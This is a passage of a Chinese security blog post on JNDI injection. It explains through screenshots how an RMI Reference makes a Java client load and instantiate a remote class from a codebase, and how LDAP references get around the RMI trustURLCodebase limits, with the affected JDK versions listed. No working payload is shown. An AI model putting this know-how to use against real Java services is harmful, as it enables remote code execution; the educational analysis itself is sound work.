<p><img src="/2023/08/26/JNDI%E6%B3%A8%E5%85%A5/Blog\source_posts\JNDI注入\image-20230828113325061.png" alt="image-20230828113325061"></p>
<p>跟进，他首先会进行类加载</p>
<p><img src="/2023/08/26/JNDI%E6%B3%A8%E5%85%A5/Blog\source_posts\JNDI注入\image-20230828113440760.png" alt="image-20230828113440760"></p>
<p>跟进loadClass，retrun中会调用本类中的另一个<code>loadClass</code></p>
<p><img src="/2023/08/26/JNDI%E6%B3%A8%E5%85%A5/Blog\source_posts\JNDI注入\image-20230828113732298.png" alt="image-20230828113732298"></p>
<p>调用Class.forName，但他是调用AppClassLoader从本地找Exec.class，所以肯定是找不到的</p>
<p>找不到后，就会从codebase中寻找，codebase通过ref.getFactoryClassLocation()，就会变成我们传入的远程对象</p>
<p><img src="/2023/08/26/JNDI%E6%B3%A8%E5%85%A5/Blog\source_posts\JNDI注入\image-20230828114009932.png" alt="image-20230828114009932"></p>
<p><img src="/2023/08/26/JNDI%E6%B3%A8%E5%85%A5/Blog\source_posts\JNDI注入\5af4f06abfea4058a733bc2b881c07ed.png#pic_center"></p>
<p>重新加载结束后通过最后的newInstance成功实例化，远程执行加载类</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">return</span> (clas != <span class="keyword">null</span>) ? (ObjectFactory) clas.newInstance() : <span class="keyword">null</span>;</span><br></pre></td></tr></table></figure>



<h3 id="总结"><a href="#总结" class="headerlink" title="总结"></a>总结</h3><p><code>codebase</code>远程加载类是导致该漏洞的关键因素</p>
<h2 id="LDAP攻击实现"><a href="#LDAP攻击实现" class="headerlink" title="LDAP攻击实现"></a>LDAP攻击实现</h2><h3 id="注入原理-1"><a href="#注入原理-1" class="headerlink" title="注入原理"></a>注入原理</h3><p>除了RMI服务之外，JNDI还可以对接LDAP服务，且LDAP也能返回JNDI Reference对象，利用过程与上面RMI Reference基本一致，只是lookup()中的URL为一个LDAP地址如ldap://xxx/xxx，由攻击者控制的LDAP服务端返回一个恶意的JNDI Reference对象。</p>
<p>注意一点就是，<strong>LDAP+Reference的远程加载Factory类不受RMI+Reference中的com.sun.jndi.rmi.object.trustURLCodebase、com.sun.jndi.cosnaming.object.trustURLCodebase等属性的限制，所以适用范围更广</strong>。</p>
<h3 id="影响版本-1"><a href="#影响版本-1" class="headerlink" title="影响版本"></a><strong>影响版本</strong></h3><p>JDK &lt;= 8u191 且版本不为7u201、6u211、6u141、7u131、8u121</p>
<p>这些版本的<code>com.sun.jndi.ldap.object.trustURLCodebase</code>属性默认值为false</p>
<h3 id="LDAP攻击"><a href="#LDAP攻击" class="headerlink" title="LDAP攻击"></a>LDAP攻击</h3><h1 id="参考"><a href="#参考" class="headerlink" title="参考"></a>参考</h1><ol>
<li><a target="_blank" rel="noopener" href="https://www.cnblogs.com/freelancy/p/17526233.html">https://www.cnblogs.com/freelancy/p/17526233.html</a></li>
</ol>

    </div>

    
    
    
        

  <div class="followme">
    <p>欢迎关注我的其它发布渠道</p>

    <div class="social-list">

        <div class="social-item">
          <a target="_blank" class="social-link" href="/images/wechat_channel.jpg">
            <span class="icon">
              <i class="fab fa-weixin"></i>
            </span>

            <span class="label">WeChat</span>
          </a>
        </div>
    </div>
  </div>


      <footer class="post-footer">

        


        
    <div class="post-nav">
      <div class="post-nav-item">
    <a href="/2023/08/18/fastjson/" rel="prev" title="Fastjson">
      <i class="fa fa-chevron-left"></i> Fastjson
    </a></div>
      <div class="post-nav-item">
    <a href="/2023/08/29/java%E5%8E%9F%E7%94%9F%E5%BA%8F%E5%88%97%E5%8C%96%E4%B8%8E%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96/" rel="next" title="Java序列化与反序列化">
      Java序列化与反序列化 <i class="fa fa-chevron-right"></i>
    </a></div>
    </div>
      </footer>
    
  </article>
  
  
  



          </div>
          

<script>
  window.addEventListener('tabs:register', () => {
    let { activeClass } = CONFIG.comments;
    if (CONFIG.comments.storage) {
      activeClass = localStorage.getItem('comments_active') || activeClass;
    }
    if (activeClass) {
      let activeTab = document.querySelector(`a[href="#comment-${activeClass}"]`);
      if (activeTab) {
        activeTab.click();
      }
    }
  });
  if (CONFIG.comments.storage) {
    window.addEventListener('tabs:click', event => {
      if (!event.target.matches('.tabs-comment .tab-content .tab-pane')) return;
      let commentClass = event.target.classList[1];
      localStorage.setItem('comments_active', commentClass);
    });
  }
</script>

        </div>
          
  
  <div class="toggle sidebar-toggle">
    <span class="toggle-line toggle-line-first"></span>
    <span class="toggle-line toggle-line-middle"></span>
    <span class="toggle-line toggle-line-last"></span>
  </div>

  <aside class="sidebar">
    <div class="sidebar-inner">

      <ul class="sidebar-nav motion-element">
        <li class="sidebar-nav-toc">
          文章目录
        </li>
        <li class="sidebar-nav-overview">
          站点概览
        </li>
      </ul>

      <!--noindex-->
      <div class="post-toc-wrap sidebar-panel">
          <div class="post-toc motion-element"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#JNDI%E4%BB%8B%E7%BB%8D"><span class="nav-number">1.</span> <span class="nav-text">JNDI介绍</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#%E7%AE%80%E4%BB%8B"><span class="nav-number">1.1.</span> <span class="nav-text">简介</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E4%BC%98%E7%82%B9"><span class="nav-number">1.2.</span> <span class="nav-text">优点</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E7%BB%84%E4%BB%B6"><span class="nav-number">1.3.</span> <span class="nav-text">组件</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#%E6%BC%8F%E6%B4%9E"><span class="nav-number">2.</span> <span class="nav-text">漏洞</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#RMI%E6%94%BB%E5%87%BB%E5%AE%9E%E7%8E%B0"><span class="nav-number">2.1.</span> <span class="nav-text">RMI攻击实现</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#%E6%B3%A8%E5%85%A5%E5%8E%9F%E7%90%86"><span class="nav-number">2.1.1.</span> <span class="nav-text">注入原理</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E5%BD%B1%E5%93%8D%E7%89%88%E6%9C%AC"><span class="nav-number">2.1.2.</span> <span class="nav-text">影响版本</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#JNDI%E5%92%8CRMI%E7%BB%93%E5%90%88%E4%BD%BF%E7%94%A8"><span class="nav-number">2.1.3.</span> <span class="nav-text">JNDI和RMI结合使用</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#RMI%E6%94%BB%E5%87%BB"><span class="nav-number">2.1.4.</span> <span class="nav-text">RMI攻击</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E6%94%BB%E5%87%BB%E6%B5%81%E7%A8%8B%E5%88%86%E6%9E%90"><span class="nav-number">2.1.5.</span> <span class="nav-text">攻击流程分析</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E6%80%BB%E7%BB%93"><span class="nav-number">2.1.6.</span> <span class="nav-text">总结</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#LDAP%E6%94%BB%E5%87%BB%E5%AE%9E%E7%8E%B0"><span class="nav-number">2.2.</span> <span class="nav-text">LDAP攻击实现</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#%E6%B3%A8%E5%85%A5%E5%8E%9F%E7%90%86-1"><span class="nav-number">2.2.1.</span> <span class="nav-text">注入原理</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E5%BD%B1%E5%93%8D%E7%89%88%E6%9C%AC-1"><span class="nav-number">2.2.2.</span> <span class="nav-text">影响版本</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#LDAP%E6%94%BB%E5%87%BB"><span class="nav-number">2.2.3.</span> <span class="nav-text">LDAP攻击</span></a></li></ol></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#%E5%8F%82%E8%80%83"><span class="nav-number">3.</span> <span class="nav-text">参考</span></a></li></ol></div>
      </div>
      <!--/noindex-->

      <div class="site-overview-wrap sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
    <img class="site-author-image" itemprop="image" alt="B3c0me"
      src="/images/head.jpg">
  <p class="site-author-name" itemprop="name">B3c0me</p>
  <div class="site-description" itemprop="description">去爱 去工作</div>
</div>
<div class="site-state-wrap motion-element">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
          <a href="/archives/">
        
          <span class="site-state-item-count">79</span>
          <span class="site-state-item-name">日志</span>
        </a>
      </div>
      <div class="site-state-item site-state-categories">
            <a href="/categories/">
          
        <span class="site-state-item-count">18</span>
        <span class="site-state-item-name">分类</span></a>
      </div>
      <div class="site-state-item site-state-tags">
            <a href="/tags/">
          
        <span class="site-state-item-count">17</span>
        <span class="site-state-item-name">标签</span></a>
      </div>
  </nav>
</div>
  <div class="sidebar-button motion-element"><i class="fa fa-comment"></i>
    Chat
  </a>
  </div>
  <div class="links-of-author motion-element">
      <span class="links-of-author-item">
        <a href="https://github.com/zcwww6" title="GitHub → https:&#x2F;&#x2F;github.com&#x2F;zcwww6" rel="noopener" target="_blank"><i class="fab fa-github fa-fw"></i>GitHub</a>
      </span>
      <span class="links-of-author-item">
        <a href="mailto:1311839468@qq.com" title="E-Mail → mailto:1311839468@qq.com" rel="noopener" target="_blank"><i class="fa fa-envelope fa-fw"></i>E-Mail</a>
      </span>
  </div>



      </div>

    </div>
  </aside>
  <div id="sidebar-dimmer"></div>


      </div>
    </main>

    <footer class="footer">
      <div class="footer-inner">
        

        

<div class="copyright">
  
  &copy; 
  <span itemprop="copyrightYear">2023</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">greyArea</span>
</div>
  <div class="powered-by">由 <a href="https://hexo.io/" class="theme-link" rel="noopener" target="_blank">Hexo</a> & <a href="https://theme-next.org/" class="theme-link" rel="noopener" target="_blank">NexT.Gemini</a> 强力驱动
  </div>

        
<div class="busuanzi-count">
  <script async src="https://busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>
    <span class="post-meta-item" id="busuanzi_container_site_uv" style="display: none;">
      <span class="post-meta-item-icon">
        <i class="fa fa-user"></i>
      </span>
      <span class="site-uv" title="总访客量">
        <span id="busuanzi_value_site_uv"></span>
      </span>
    </span>
    <span class="post-meta-divider">|</span>
    <span class="post-meta-item" id="busuanzi_container_site_pv" style="display: none;">
      <span class="post-meta-item-icon">
        <i class="fa fa-eye"></i>
      </span>
      <span class="site-pv" title="总访问量">
        <span id="busuanzi_value_site_pv"></span>
      </span>
    </span>
</div>








      </div>
    </footer>
  </div>

  
  <script src="/lib/anime.min.js"></script>
  <script src="/lib/velocity/velocity.min.js"></script>
  <script src="/lib/velocity/velocity.ui.min.js"></script>

<script src="/js/utils.js"></script>

<script src="/js/motion.js"></script>


<script src="/js/schemes/pisces.js"></script>


<script src="/js/next-boot.js"></script>




  















  

  

</body>
</html>
